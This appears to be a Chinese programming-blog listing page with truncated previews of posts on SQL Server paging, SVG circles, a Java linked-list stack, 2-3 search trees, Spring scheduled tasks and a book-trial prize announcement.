    本文适用于sql server单主键表或者视图进行分页查询,支持多字段排序。KeleyiSQLHelper类的最新代码请到http://hovertree.codeplex.com/SourceControl/latest下载整个解决方案源代码查看。或者直接在线查看类的代码:http://hovertree.codeplex.com/SourceControl/latest#HoverTree.D
  • SVG 教程 (三)圆形,椭圆,直线 天梯梦 svg
    SVG <circle> SVG 圆形 - <circle> <circle> 标签可用来创建一个圆: 下面是SVG代码: <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle cx="100" c
  • 链表栈 luyulong java数据结构
    public class Node { private Object object; private Node next; public Node() { this.next = null; this.object = null; } public Object getObject() { return object; } public
  • 基础数据结构和算法十:2-3 search tree sunwinner Algorithm2-3 search tree
      Binary search tree works well for a wide variety of applications, but they have poor worst-case performance. Now we introduce a type of binary search tree where costs are guaranteed to be loga
  • spring配置定时任务 stunizhengjia springtimer
    最近因工作的需要,用到了spring的定时任务的功能,觉得spring还是很智能化的,只需要配置一下配置文件就可以了,在此记录一下,以便以后用到:     //------------------------定时任务调用的方法------------------------------ /** * 存储过程定时器 */ publi
  • ITeye 8月技术图书有奖试读获奖名单公布 ITeye管理员 活动
    ITeye携手博文视点举办的8月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 8月试读活动回顾: http://webmaster.iteye.com/blog/2102830 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《跨终端Web》 gleams:http
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他